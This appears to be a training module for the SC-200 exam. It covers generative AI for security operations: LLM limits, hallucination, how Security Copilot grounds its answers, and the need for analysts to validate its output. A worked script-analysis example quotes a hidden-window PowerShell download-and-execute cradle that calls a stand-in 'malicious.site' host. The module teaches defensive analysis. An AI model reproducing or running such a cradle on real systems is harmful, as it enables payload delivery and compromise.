5.1 Generative AI for Security Operations

12-16 hours · Module 5


SC-200 Exam Objective

Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." Understanding generative AI fundamentals is a prerequisite for using Copilot effectively and evaluating its output critically.

Introduction

Before using Security Copilot, you need to understand what it is and what it is not. Copilot is not a button that solves incidents. It is not an analyst replacement. It is not infallible. It is a generative AI assistant that processes natural language prompts and produces natural language responses, grounded in security data from your environment and Microsoft’s threat intelligence. Its output is often excellent, sometimes wrong, and always requires validation by a qualified analyst.

This subsection provides the conceptual foundation for understanding how Copilot works, why grounding matters for security accuracy, what hallucination risk means in an investigation context (where a wrong answer is not just unhelpful — it can lead to incorrect response actions), and what realistic expectations look like for AI-assisted security operations.


What large language models are (and are not)

Security Copilot is built on large language models (LLMs) — the same foundational technology as ChatGPT, but with critical additions for security operations. Understanding LLMs at a conceptual level helps you predict when Copilot will be accurate and when it might produce incorrect output.

An LLM is a neural network trained on massive amounts of text data. It learns patterns in language — not facts, not logic, not reasoning, but statistical patterns of which words follow which other words in which contexts. When you prompt Copilot with “Summarise this incident,” the model generates a response by predicting the most likely next word, then the next, then the next, based on the patterns it learned during training and the context of your prompt.

What this means for security operations:

LLMs are excellent at summarisation — taking a large volume of alert data, log entries, and investigation notes, and producing a coherent narrative. They are excellent at translation — converting natural language (“show me all failed sign-ins from Russia in the last 24 hours”) into KQL queries. They are excellent at explanation — describing what a PowerShell script does, what an alert means, or what a MITRE ATT&CK technique involves. These are language tasks, and LLMs are exceptionally good at language tasks.

LLMs are less reliable at reasoning about novel situations that were not represented in their training data, at mathematical calculations, at precise factual recall (they may “remember” training data incorrectly), and at distinguishing between plausible-sounding output and correct output. These limitations are not bugs — they are inherent characteristics of how statistical language models work.

The hallucination problem in security contexts

LLMs sometimes generate output that is confidently stated, grammatically correct, and completely wrong. In a casual conversation, this is an inconvenience. In a security investigation, it is dangerous. If Copilot generates a KQL query that looks correct but has a subtle logical error (wrong operator, incorrect time window, missing filter), the query returns incorrect results — and you may base investigation conclusions on those results. If Copilot summarises an incident and includes a detail that does not exist in the actual alert data, you may report a finding that is not supported by evidence. Every Copilot output must be validated before it is acted upon or documented.
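One lightweight guard against this failure mode is a mechanical cross-check: pull the specific figures out of a generated summary and confirm each one actually appears in the underlying evidence. A minimal sketch in Python — the summary text, alert text, and crude regex-based claim extraction here are all illustrative, not part of any Copilot API:

```python
import re

def unsupported_figures(summary: str, evidence: str) -> list[str]:
    """Return numeric claims in the summary that never appear in the evidence.

    A crude hallucination check: any figure (e.g. '2.3 GB') that the model
    states but the raw alert data does not contain is flagged for review.
    """
    figures = re.findall(r"\d+(?:\.\d+)?\s*(?:GB|MB|KB)?", summary)
    return [f for f in figures if f.strip() and f not in evidence]

# Hypothetical example: the '2.3 GB' volume is not in the alert data.
summary = "The attacker exfiltrated 2.3 GB from the storage account over 4 hours."
evidence = "Alert: anomalous access to storage account. Duration: 4 hours."
print(unsupported_figures(summary, evidence))  # ['2.3 GB']
```

A real implementation would need far more robust claim extraction, but even this naive version would have caught the fabricated exfiltration volume described above.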


Grounding: why Security Copilot is not just an LLM

The difference between a general-purpose LLM and Security Copilot is grounding — the mechanism that connects the model to your organisation’s actual security data. When you ask Copilot “Summarise incident INC-2026-0321,” it does not generate a summary from its training data (which knows nothing about your incidents). It retrieves the incident data from Defender XDR, feeds that data into the prompt context, and generates a summary grounded in the actual incident details.

[Figure 5.1 diagram — Security Copilot grounded AI architecture: your prompt ("Summarise incident 321") → orchestration layer (identifies data sources needed, retrieves via plugins: Defender XDR | Sentinel | Entra ID | TI feeds) → LLM (prompt + grounding data) → grounded response based on YOUR data]
Figure 5.1: Security Copilot's grounded AI architecture. Your prompt is processed by an orchestration layer that identifies which data sources to query (Defender XDR, Sentinel, Entra ID, threat intelligence feeds). The retrieved data is combined with your prompt and sent to the LLM. The response is grounded in your actual security data — not generated from generic training data.

Grounding sources include:

Microsoft Defender XDR — incidents, alerts, device timelines, email events, identity events, and Advanced Hunting data from your tenant.

Microsoft Sentinel — log data, analytics rules, incidents, and hunting queries from your Sentinel workspace.

Microsoft Entra ID — sign-in logs, user risk data, conditional access evaluation results.

Microsoft Purview — audit log data, DLP findings, compliance status.

Microsoft threat intelligence — Microsoft’s own threat intelligence database, which includes threat actor profiles, attack technique descriptions, IOC databases, and vulnerability information.

Third-party plugins — additional data sources connected through the plugin architecture (custom APIs, SOAR platforms, ITSM tools).

The quality of Copilot’s output depends directly on the quality and availability of grounding data. If your Sentinel workspace does not contain the relevant logs, Copilot cannot query them. If your Defender XDR incident is incomplete (missing correlated alerts because a connector is misconfigured), Copilot’s summary will be incomplete. Grounding is only as good as the data infrastructure you built in Modules 1-4.
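The retrieve-then-prompt flow in Figure 5.1 can be sketched in a few lines. Everything below is illustrative — the get_incident function, the incident record, and the prompt shape are stand-ins for Copilot's internal plugin architecture, not a real Security Copilot API:

```python
# Illustrative sketch of grounding: retrieve tenant data first, then
# combine it with the analyst's prompt before the LLM ever sees it.

def get_incident(incident_id: str) -> dict:
    """Hypothetical stand-in for a Defender XDR plugin call."""
    return {
        "id": incident_id,
        "title": "Suspicious sign-in followed by mailbox rule creation",
        "alerts": ["Atypical travel", "Suspicious inbox manipulation rule"],
    }

def build_grounded_prompt(user_prompt: str, incident_id: str) -> str:
    """Combine the analyst's question with retrieved grounding data.

    Without the grounding block, the LLM could only answer from generic
    training knowledge; with it, the response is tied to YOUR incident.
    """
    incident = get_incident(incident_id)
    grounding = (f"Incident {incident['id']}: {incident['title']}. "
                 f"Alerts: {', '.join(incident['alerts'])}.")
    return f"{user_prompt}\n\n[Grounding data]\n{grounding}"

prompt = build_grounded_prompt("Summarise incident INC-2026-0321", "INC-2026-0321")
print(prompt)
```

The design point the sketch makes: grounding happens in the orchestration layer, before generation — the model is not retrained on your data, it is handed your data at prompt time.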


What Copilot can and cannot do

Security Copilot — Realistic Capability Assessment
Task | Copilot's ability | Analyst's role
---- | ----------------- | --------------
Summarise a complex incident | Excellent — fast, comprehensive | Verify accuracy against raw data
Explain what an alert means | Excellent — contextual explanation | Assess relevance to your environment
Generate KQL queries from natural language | Good — usually correct, sometimes wrong | Validate query logic before running
Analyse a PowerShell/Python script | Excellent — detailed breakdown | Verify against known malware patterns
Recommend response actions | Good — reasonable suggestions | Evaluate appropriateness for context
Draft an incident report | Good — structured, comprehensive | Edit for accuracy, add context
Determine root cause of a novel attack | Limited — may miss novel patterns | Apply investigation expertise
Make response decisions | Cannot — suggests, does not decide | All decisions are the analyst's
Access data outside your tenant | Cannot — grounded to your data only | Understand data boundaries
Replace analyst expertise | Cannot — amplifies, does not replace | You are the expert; Copilot is the tool
The human-in-the-loop principle: Copilot generates output. You evaluate it. Copilot suggests actions. You decide. Copilot drafts reports. You verify and approve. This is not a limitation — it is the correct operational model. An AI system that makes unvalidated security decisions is a liability, not an asset. The analyst's judgement is the quality control layer.

The accuracy problem: why validation is non-negotiable

Copilot’s output is correct most of the time. “Most of the time” is not good enough for security operations, where a single incorrect conclusion can lead to wrong response actions, missed threats, or false reports to management.

Scenario 1: KQL query with a subtle error. You ask Copilot to generate a query for “all sign-ins from Russia in the last 24 hours.” Copilot generates a query that filters on LocationDetails.countryOrRegion == "Russia". But the correct value in your logs is "RU" (ISO country code), not "Russia" (full country name). The query returns zero results. If you trust the query without validation, you conclude there were no sign-ins from Russia — when in fact there were 15. The investigation misses the compromise.
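The failure in Scenario 1 is easy to reproduce, and equally easy to catch: before trusting a generated filter, list the distinct values the field actually holds. A Python sketch with made-up sign-in records (against live data you would run a distinct-values query, e.g. KQL's distinct operator, instead):

```python
# Hypothetical sign-in records -- the logs store ISO codes ('RU'),
# while the generated query filtered on the full name ('Russia').
signins = [
    {"user": "jsmith", "country": "RU"},
    {"user": "mlopez", "country": "US"},
    {"user": "akumar", "country": "RU"},
]

# The generated filter: returns zero rows, silently missing the activity.
generated = [s for s in signins if s["country"] == "Russia"]

# Validation step: check what values the field actually contains first.
distinct_values = sorted({s["country"] for s in signins})
corrected = [s for s in signins if s["country"] == "RU"]

print(len(generated))    # 0 -- the subtle error
print(distinct_values)   # ['RU', 'US'] -- reveals the mismatch
print(len(corrected))    # 2 -- the sign-ins that were actually there
```

Thirty seconds of checking distinct values turns a silent false negative into an obvious filter bug.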

Scenario 2: Incident summary that includes a non-existent detail. Copilot summarises an incident and states “the attacker exfiltrated 2.3 GB of data from the customer-data storage account.” You include this in the incident report. But the actual incident data shows the attacker accessed the storage account — it does not confirm data download volume. Copilot inferred the detail from the alert description, but the specific number was hallucinated. The incident report now contains an unsupported claim.

Scenario 3: Response recommendation that is inappropriate for context. Copilot recommends “disable the compromised user’s account.” This is generally correct for a compromised account. But in this case, the user is the CFO who is about to join a board meeting in 15 minutes. Disabling their account without coordination will disrupt a critical business function. Copilot does not know about the board meeting. The analyst does.

The validation principle: Copilot output is a draft, not a deliverable. Every KQL query is tested before trusting results. Every incident summary is cross-checked against the raw alert data. Every response recommendation is evaluated against operational context. This validation step takes 2-5 minutes — a small investment compared to the hours Copilot saves in generating the initial output.


Realistic expectations for AI-assisted SOC operations

Security Copilot does not transform a novice into an expert. It transforms an expert into a faster expert. The acceleration is real and significant — an experienced analyst using Copilot can investigate incidents 40-60% faster than the same analyst working manually. But the acceleration depends on the analyst’s ability to evaluate and refine Copilot’s output.

Where Copilot saves the most time:

Alert triage — Copilot can summarise a complex multi-alert incident in 10 seconds that would take an analyst 10 minutes to read through manually. This is the highest-value use case for daily SOC operations.

KQL query generation — translating investigation questions into KQL queries. Instead of writing queries from scratch, the analyst describes what they need in natural language and Copilot generates the query. The analyst validates and runs it. Time saved: 5-15 minutes per query.

Script analysis — when an alert includes a suspicious PowerShell, Python, or bash script, Copilot analyses the script and explains what each section does. This is particularly valuable for obfuscated scripts that would take significant manual effort to deobfuscate and analyse.

Report drafting — generating the initial draft of an incident report from the investigation data. The analyst edits for accuracy, adds context, and refines the conclusions. Time saved: 30-60 minutes per report.

Where Copilot does not save time:

Novel attack patterns — if the attack is truly novel (not represented in training data or threat intelligence), Copilot may not recognise it. The analyst’s pattern recognition and investigative intuition remain essential.

Contextual decisions — Copilot does not know your organisation’s risk tolerance, business context, or operational constraints. Response decisions require human judgement.

Evidence validation — confirming that investigation findings are supported by the evidence requires the analyst to examine the raw data. Copilot can point you to the data, but you must verify it.


Retrieval vs reasoning: understanding Copilot’s strengths

Copilot excels at retrieval tasks — finding data, summarising data, and translating between formats (natural language to KQL, raw data to narrative, technical findings to executive summary). These are tasks where the answer exists in the grounding data and Copilot needs to find and present it.

Copilot is weaker at reasoning tasks — determining whether a pattern of activity is malicious, predicting what an attacker will do next, or deciding which of two ambiguous findings is more important. These tasks require judgement that the model approximates from training patterns but does not truly perform.

Practical implication for SOC workflow: Delegate retrieval to Copilot. Retain reasoning for the analyst.

Retrieval examples (delegate): “What are the alerts in this incident?” “Generate a KQL query for sign-ins from Russia.” “Explain what this PowerShell command does.” “List the MITRE ATT&CK techniques in this incident.”

Reasoning examples (retain): “Is this a true positive or a false positive?” “Should we isolate this server or restrict its network access?” “Is the data exposure severe enough to trigger regulatory notification?” “Is this attacker likely to return through a different vector?”

The distinction is not always clear-cut — some tasks blend retrieval and reasoning. Copilot’s MITRE ATT&CK mapping is mostly retrieval (matching observed activity to documented techniques) but includes reasoning when the activity does not perfectly match any technique. In these blended cases, validate the reasoning component even if the retrieval component is clearly correct.


Worked comparison: script analysis manual vs Copilot

To make the time difference concrete, consider a real-world script analysis scenario.

A Defender for Endpoint alert includes this PowerShell command line:

powershell -w hidden -nop -c "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk')))"

Manual analysis (15-20 minutes): Recognise Base64 encoding. Extract the Base64 string. Decode it using a Base64 decoder (CyberChef, PowerShell, or Python). Read the decoded content (a URL). Recognise that IEX downloads and executes content from the URL. Check the URL against threat intelligence. Assess the overall purpose: this is a download-and-execute cradle — Stage 1 of a multi-stage attack. Document the findings: the execution technique, the C2 URL, and the assessment.

Copilot analysis (30 seconds): Paste the command into Copilot with the prompt “Analyse this PowerShell command. Decode any encoded content. Identify IOCs. Assess the purpose.”

Copilot responds: “This PowerShell command uses hidden window mode (-w hidden) and no profile (-nop) to execute a Base64-encoded Invoke-Expression command. The decoded Base64 string is the URL ‘https://malicious.site/payload’. The command downloads and executes content from this URL using IEX (Invoke-Expression), which is a common download-and-execute cradle used for initial payload delivery. IOC: malicious.site. Assessment: Stage 1 payload delivery — the downloaded content is likely a second-stage implant or C2 beacon.”

Analyst validation (1 minute): Manually decode the Base64 to confirm the URL matches Copilot’s decoding. Check the URL against threat intelligence. Confirmed — the analysis is accurate.
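The one-minute validation step is itself scriptable — decoding the Base64 independently confirms (or refutes) the URL Copilot claims to have found:

```python
import base64

# The encoded string lifted from the alert's command line.
encoded = "aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk"

# Decode it yourself rather than trusting the AI's decoding.
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)  # https://malicious.site/payload -- matches Copilot's analysis
```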

Total: 1.5 minutes with Copilot vs 15-20 minutes manual. For heavily obfuscated scripts with multiple layers of encoding, variable substitution, and string concatenation, the time savings are even greater — 30 seconds vs 45-60 minutes.

Try it yourself

If your organisation has Security Copilot enabled, navigate to securitycopilot.microsoft.com and explore the standalone experience. Try a simple prompt: "What is Microsoft Defender XDR?" and evaluate the response. Is it accurate? Is it grounded in your environment's data, or is it a general knowledge response? Then try an environment-specific prompt: "Show me the most recent incidents in my Defender XDR portal." Compare the two responses — the first is generic knowledge (from training data), the second is grounded in your data (from the Defender XDR plugin). This demonstrates the grounding difference.

What you should observe

The general knowledge prompt produces a textbook-style response. The environment-specific prompt produces a response that references your actual incidents, alert names, and affected entities. If Copilot cannot access your Defender XDR data (plugin not configured, insufficient permissions), the environment-specific prompt returns an error or a generic response — demonstrating that grounding requires properly configured data access.


Knowledge check

Check your understanding

1. Copilot generates a KQL query for your investigation. How should you handle it?

Validate the query before running it. Check the table names, field names, operators, filter values, and time windows against your knowledge of the data schema. Run the query and verify the results make sense — do the returned records match what you expect? If the query returns unexpected results (zero rows when you expect matches, or too many rows), check for the common LLM errors: wrong field values (country name vs country code), incorrect operators (== vs has), missing filters, or wrong table names.
Run it immediately — Copilot queries are always correct
Rewrite it from scratch — Copilot queries cannot be trusted
Copy it into the incident report without running it

2. What is "grounding" in the context of Security Copilot?

Grounding connects the LLM to your organisation's actual security data through plugins. When you ask Copilot about an incident, the orchestration layer retrieves the incident data from Defender XDR and feeds it into the prompt context. The LLM generates a response based on your actual data — not from generic training knowledge. Without grounding, Copilot would produce generic security information rather than environment-specific analysis.
Training the model on your organisation's data
Installing the Copilot agent on endpoints
Restricting Copilot to only security topics

3. A junior analyst asks: "If Copilot can summarise incidents and generate KQL, why do I need to learn investigation skills?" What do you tell them?

Copilot amplifies expertise — it does not replace it. Without investigation skills, you cannot evaluate whether Copilot's summary is accurate, whether the generated KQL is correct, or whether the recommended response is appropriate. Copilot makes an expert faster. It does not make a novice an expert. Learning to investigate manually (Modules 1-4) is prerequisite to using Copilot effectively — the AI output is only as useful as your ability to validate it.
They are right — Copilot eliminates the need for manual investigation
Investigation skills are only needed when Copilot is unavailable
Copilot is just a trend — it will not last